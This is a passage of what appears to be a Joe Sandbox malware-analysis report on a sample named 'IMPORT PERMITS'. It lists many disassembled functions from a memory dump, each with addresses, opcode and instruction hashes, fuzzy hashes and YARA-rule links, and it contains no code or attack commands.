                                                                                                                                • Opcode Fuzzy Hash: 9d3101da012b1ab0b3269284cfb147abff8347a79c4c12d85f06832508ebd548
                                                                                                                                • Instruction Fuzzy Hash: 3F01A771201502FFD711AB7ECD44E57B7ACFF55698701052EB60993661DB74EC01C6E0
                                                                                                                                Function 014769C0 Relevance: .0, Instructions: 49COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0b061b1b74e155ebe196d7e37889ec331efd48b4e599b45c4c229d5250e02703
                                                                                                                                • Instruction ID: 4e747ad07f10543e7310ce6bba26ed1ec7e13db78fa2d669749a0523715219c7
                                                                                                                                • Opcode Fuzzy Hash: 0b061b1b74e155ebe196d7e37889ec331efd48b4e599b45c4c229d5250e02703
                                                                                                                                • Instruction Fuzzy Hash: 8A012D322146119FD324EF6E94449A7FBA9EB95620F12411AE95487290E7309901C7D1
                                                                                                                                Function 0146C460 Relevance: .0, Instructions: 48COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d870ab937c3548b6d356a7ec7f0057d35055451bf0bbe0dabcce630e59ddcb50
                                                                                                                                • Instruction ID: e08e4847ece2e94940f81521f207ee5739961ab8261d52c65643b353e89cf44e
                                                                                                                                • Opcode Fuzzy Hash: d870ab937c3548b6d356a7ec7f0057d35055451bf0bbe0dabcce630e59ddcb50
                                                                                                                                • Instruction Fuzzy Hash: D711AD70A0020DEBCF14EF69C880EAE7BBAFB58304F00406AFD41973A0DA34E911CB91
                                                                                                                                Function 0146C97C Relevance: .0, Instructions: 48COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e9e6a7e918d1711bf27d8b472907449ef1abbc94acb6ca60a172e2e30e3ac46b
                                                                                                                                • Instruction ID: 5001d386281d574b86eafa380cde5ac4d345a70f08fd8bb38d92c00f697b9bb4
                                                                                                                                • Opcode Fuzzy Hash: e9e6a7e918d1711bf27d8b472907449ef1abbc94acb6ca60a172e2e30e3ac46b
                                                                                                                                • Instruction Fuzzy Hash: 931179B16083089FC700DF6AC44195BBBE8EF98310F00451FFA98D73A0E630E900CBA2
                                                                                                                                Function 0146CA11 Relevance: .0, Instructions: 48COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4cdd81e1eb93f1b0727cdfc1be1e4aab956e5ec7bd6f08093e8f1992de759047
                                                                                                                                • Instruction ID: 61a9bef6ae280cb206f45782f41c228937ad120b781d881a242e6a58a97a1b41
                                                                                                                                • Opcode Fuzzy Hash: 4cdd81e1eb93f1b0727cdfc1be1e4aab956e5ec7bd6f08093e8f1992de759047
                                                                                                                                • Instruction Fuzzy Hash: 491157B16083089FC710DF6AC441A4BBBE8EF99350F00851FF998D73A0E630E900CBA2
                                                                                                                                Function 013FE016 Relevance: .0, Instructions: 46COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                                • Instruction ID: 332d0501644f14cb6a86e80cc738a2147f4b10b27174ee7b534e484a8283e23e
                                                                                                                                • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                                • Instruction Fuzzy Hash: 81018F722015859FE322871EC948F277BDDEF88758F0A04BAFA05CBAB1D678DC40C625
                                                                                                                                Function 013D826B Relevance: .0, Instructions: 46COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a912855958bf287c691890a08eb4332643e1cd811773bc0fa19b752c4252288d
                                                                                                                                • Instruction ID: 4ce245712b33aef562edabca722fb83e9cef0d63a3db334315b54185d81052e5
                                                                                                                                • Opcode Fuzzy Hash: a912855958bf287c691890a08eb4332643e1cd811773bc0fa19b752c4252288d
                                                                                                                                • Instruction Fuzzy Hash: FD01D472B00509DBD714EB6EEC009AEB7BCFF90618F05406AD902A7664EE30EC01C691
                                                                                                                                Function 0148EB50 Relevance: .0, Instructions: 46COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: cf08e4092085fcba8049c9512ede3cb20ba65b9c0dc3e780924f0adc48ee6602
                                                                                                                                • Instruction ID: 100face864b8ef92ef74af85dced9cd8723223f45c9f69f4b87756833444081b
                                                                                                                                • Opcode Fuzzy Hash: cf08e4092085fcba8049c9512ede3cb20ba65b9c0dc3e780924f0adc48ee6602
                                                                                                                                • Instruction Fuzzy Hash: BA018FB1241601AFD731AF1AD840F06BAA8AF65B50F12442FF31AAB3A0D6B0D8418B64
                                                                                                                                Function 013E2582 Relevance: .0, Instructions: 45COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3dd4fa73af9c01f6144c5c14c646eb4fec85a3201c5a45e2ec247c6c675754bb
                                                                                                                                • Instruction ID: 2199c3f952eb07d2d1ce0cd0ea33cc0534a57ef84a507074c99c9444fdb5bea9
                                                                                                                                • Opcode Fuzzy Hash: 3dd4fa73af9c01f6144c5c14c646eb4fec85a3201c5a45e2ec247c6c675754bb
                                                                                                                                • Instruction Fuzzy Hash: A1F0F932641721F7C7319B5A8D44F57BEEDEB84A94F114029A60697690C630DD01C6A0
                                                                                                                                Function 0140C073 Relevance: .0, Instructions: 43COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                                • Instruction ID: e0e227456793bf53cdd35f2a507fc8c8df5455a90e439f7dfe8fd5d7ff61435b
                                                                                                                                • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                                • Instruction Fuzzy Hash: 8CF0C8F2600615ABD325CF4EDC80E57FBEADBD1A80F048169E515C7320EA31DD04CB50
                                                                                                                                Function 014B634F Relevance: .0, Instructions: 43COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5325108717ff64ce64804bbdc98740dad636062d006fee5229077354c974d831
                                                                                                                                • Instruction ID: 32a949e057d8fb3ddc36d0ee99ec96c3586dfd3dd21d8f8c9fd2cd9f5655d82a
                                                                                                                                • Opcode Fuzzy Hash: 5325108717ff64ce64804bbdc98740dad636062d006fee5229077354c974d831
                                                                                                                                • Instruction Fuzzy Hash: 69012C71A11219ABDB04DFAAD551AAEBBF8FF58304F11406AF904E73A0D6749A018BA0
                                                                                                                                Function 013DC310 Relevance: .0, Instructions: 43COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                                • Instruction ID: 2311624f28daf4b7dd10d25ab3236b84bc121259797082cbe852a36e6ee8a6c2
                                                                                                                                • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                                • Instruction Fuzzy Hash: 1CF081732646339BD733166D6840B6BB5998FD1A6CF1A103DF2099B644CD78CD01D3D0
                                                                                                                                Function 014B625D Relevance: .0, Instructions: 43COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 686653ea59b6712fd99cad14ad38d7c3cec4d6843d2ff78dc52ca2a831035d48
                                                                                                                                • Instruction ID: 999b9b39ad7a59bd6f39be6aea8d9c335482ea86ce6fbb9ce6bc5327492259df
                                                                                                                                • Opcode Fuzzy Hash: 686653ea59b6712fd99cad14ad38d7c3cec4d6843d2ff78dc52ca2a831035d48
                                                                                                                                • Instruction Fuzzy Hash: 5E012171A10219ABDB04DFA9D4519AEB7F8EF58304F55405AF904E7351D6749901CBA0
                                                                                                                                Function 014B62D6 Relevance: .0, Instructions: 43COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f9b7d9aed3a67a8611624b3896ef8fd84e0a9ace495e0da53c8dc2ab5d9eaf3e
                                                                                                                                • Instruction ID: bc085f15dd8699bc455300bd7f4354fe6fe2458bc6ae5a4035246058c0f10b6b
                                                                                                                                • Opcode Fuzzy Hash: f9b7d9aed3a67a8611624b3896ef8fd84e0a9ace495e0da53c8dc2ab5d9eaf3e
                                                                                                                                • Instruction Fuzzy Hash: D3012171A01219ABDB04DFA9D44199EBBF8EF58304F51405AF914E7390D674D9018BA0
                                                                                                                                Function 0141CA6F Relevance: .0, Instructions: 42COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                                                • Instruction ID: ffcf075536a0783dbc9802ffd5b493200f9668f2135153ddd8b639faa7972603
                                                                                                                                • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                                                • Instruction Fuzzy Hash: 1E01D1322446869BD323D65EC845B5ABF98EF52794F0840ABFE448B7B2EA78C801C211
                                                                                                                                Function 014B61E5 Relevance: .0, Instructions: 41COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 368d48fdc10b62ac8fb2ba83fb267dfdddededf2aa492bb54ede51ecd512c410
                                                                                                                                • Instruction ID: fee2076abc5ce6d4a5ee7bddd3e60e724b15c6eddfeeb8b408169ca09512634a
                                                                                                                                • Opcode Fuzzy Hash: 368d48fdc10b62ac8fb2ba83fb267dfdddededf2aa492bb54ede51ecd512c410
                                                                                                                                • Instruction Fuzzy Hash: 5F017C71A002599FDB04DFA9D441AEEBBB8EF58310F15005AE900A7290D734EA01CBA5
                                                                                                                                Function 014663C0 Relevance: .0, Instructions: 41COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                                • Instruction ID: a671a761f4186fe3ac7b755c90f3295d7240ecb4a103fedd13731fb519d9e7de
                                                                                                                                • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                                • Instruction Fuzzy Hash: 98F01D7220001EBFEF029F95DD80DAF7B7EEB59298B114129FA1192170D631DE21ABA0
                                                                                                                                Function 0146A4B0 Relevance: .0, Instructions: 40COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8da074f355cb3f6caeb67b3c97fd30cc82f5887ddbd71e9d7408e7f2a9a3f4e7
                                                                                                                                • Instruction ID: 285ce34df07eaa788b58979b66ee413c82c811eba2754fcacf49b8fb062db760
                                                                                                                                • Opcode Fuzzy Hash: 8da074f355cb3f6caeb67b3c97fd30cc82f5887ddbd71e9d7408e7f2a9a3f4e7
                                                                                                                                • Instruction Fuzzy Hash: 41018936111519ABCF129E84DC40EDE7F6AFB4C658F058116FE1866220C732D971EB82
                                                                                                                                Function 013DC0F0 Relevance: .0, Instructions: 39COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 16d021424c5027b7d8f3c8822543649aa8fca8f16a156147192ecf6b03cf1108
                                                                                                                                • Instruction ID: fb7f362c08570d7062f24186294d8ba5aff6b90f2b1b4c2ea1587d454388d775
                                                                                                                                • Opcode Fuzzy Hash: 16d021424c5027b7d8f3c8822543649aa8fca8f16a156147192ecf6b03cf1108
                                                                                                                                • Instruction Fuzzy Hash: 7CF02473624262ABF7109629AC42B62329AE7D0658F25902EEB058BAC1F970DC05C3A4
                                                                                                                                Function 0141656A Relevance: .0, Instructions: 39COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a8beb50b0f3966362872e4ce150b53c2e9c350d7b432b988d6cdda8091a2c2c0
                                                                                                                                • Instruction ID: 4a010701260ca33222448908d6fba7629a566657290e5d66d1cc33c35a562026
                                                                                                                                • Opcode Fuzzy Hash: a8beb50b0f3966362872e4ce150b53c2e9c350d7b432b988d6cdda8091a2c2c0
                                                                                                                                • Instruction Fuzzy Hash: B201F9703416819BE3229B2CDC08F2637A8BB00B44F490556FA008F7FBE778D442C210
                                                                                                                                Function 0148437C Relevance: .0, Instructions: 37COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                • Instruction ID: 8c27f29cd7995961a0d98fec25028fd6fb2f837a21cc768adcecdf65ec1075bd
                                                                                                                                • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                • Instruction Fuzzy Hash: 4AF0E235341E1357EB36BA2F9420B2FBA95AFB0A10B0D062F9615CB7B0DF30D8118780
                                                                                                                                Function 0146E872 Relevance: .0, Instructions: 36COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                                • Instruction ID: 7ab025943426b840e6f7b082b5fc068108215235b51b57a0acd12ef94da4498b
                                                                                                                                • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                                • Instruction Fuzzy Hash: 2FF05E767116129BEB21DA4ECC80F17B7ECAFD5A64F1A006AA604AB370C770EC02C7D1
                                                                                                                                Function 0146C89D Relevance: .0, Instructions: 36COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 630b0ba71974276426d177a81a81f8db74b6d10cb06b86f31e4fb8a20bc4912d
                                                                                                                                • Instruction ID: 1129d3659ab6e6c6fd11f0bba107c2f795d7da44444eb505777f16610f4566b8
                                                                                                                                • Opcode Fuzzy Hash: 630b0ba71974276426d177a81a81f8db74b6d10cb06b86f31e4fb8a20bc4912d
                                                                                                                                • Instruction Fuzzy Hash: 8FF0AF706093049FC320EF29C441A1BBBE4FF98714F80465FB898DB3A4EA34E901CB96
                                                                                                                                Function 01410854 Relevance: .0, Instructions: 35COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                                                • Instruction ID: 771bf35c9e68011e7ac74a4f2516f171f8b77be2548320ff151a36ebd27f355c
                                                                                                                                • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                                                • Instruction Fuzzy Hash: 14F0B472614204EFE714DF25CC01F96B6E9EFAC344F148079A949D7274FAB0DD41C654
                                                                                                                                Function 0146C912 Relevance: .0, Instructions: 34COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b5f92df33e606f783f5483d354998449da8fc0c0b03556ea22dd77942853959d
                                                                                                                                • Instruction ID: d97393846692820523621144eab32b95b6bf9fa27468f7ff3561bc62dc49b4be
                                                                                                                                • Opcode Fuzzy Hash: b5f92df33e606f783f5483d354998449da8fc0c0b03556ea22dd77942853959d
                                                                                                                                • Instruction Fuzzy Hash: EAF04F70A012499FCB14EF69C555A5EBBB4EF18304F40805AB955EB395DA38EA01CB61
                                                                                                                                Function 013E47FB Relevance: .0, Instructions: 33COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7bf12a1df517ac984b1f2f483c037224858a2078d026c38a48695771251096c1
                                                                                                                                • Instruction ID: ce7a4b693e266a5d15cf2d1b3b468a3193cd06385ec730fc60b7b99599aac2ea
                                                                                                                                • Opcode Fuzzy Hash: 7bf12a1df517ac984b1f2f483c037224858a2078d026c38a48695771251096c1
                                                                                                                                • Instruction Fuzzy Hash: 93F024319063F48FEB32CB5CC05CB617FC89B0863CF08496AC54DC3582D325E880C610
                                                                                                                                Function 014A0115 Relevance: .0, Instructions: 32COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c1e887dd21eed14814bd7c7b909ad9caf690257484e18c148dccc66757edd1c5
                                                                                                                                • Instruction ID: b6a5d7e9fcada7a4cbcdf3b8bb9f7dc455b7e05aed9fd9428d5b3c27495c7457
                                                                                                                                • Opcode Fuzzy Hash: c1e887dd21eed14814bd7c7b909ad9caf690257484e18c148dccc66757edd1c5
                                                                                                                                • Instruction Fuzzy Hash: 6DF0A7B68176C106CF325F2C68A02D66F54A776114F5B148BD4A157339C576A883C724
                                                                                                                                Function 0141C5ED Relevance: .0, Instructions: 31COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 11fbab663a95bf51d5fa267774f0bf310786d063119ac666e9f811e327b4aac3
                                                                                                                                • Instruction ID: a7c79a15b78e520a3a61ef4f54cb4f8e2a3c1220659dd0185910d479d7ae92d9
                                                                                                                                • Opcode Fuzzy Hash: 11fbab663a95bf51d5fa267774f0bf310786d063119ac666e9f811e327b4aac3
                                                                                                                                • Instruction Fuzzy Hash: CDF0E2715916519FE722971CCAC8B567BE49B407A4F08AC27D50E87A36C370E882CA90
                                                                                                                                Function 01422619 Relevance: .0, Instructions: 31COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                                • Instruction ID: 8373477da6ea421ad8d16f29848fc6cddfb0f31c9d970bd69fde3ce842002811
                                                                                                                                • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                                • Instruction Fuzzy Hash: B3E092723006112BE7219E5A8C80F577B6E9FA2B14F44007EB6085E261C9E69D5982A4
                                                                                                                                Function 01476030 Relevance: .0, Instructions: 29COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
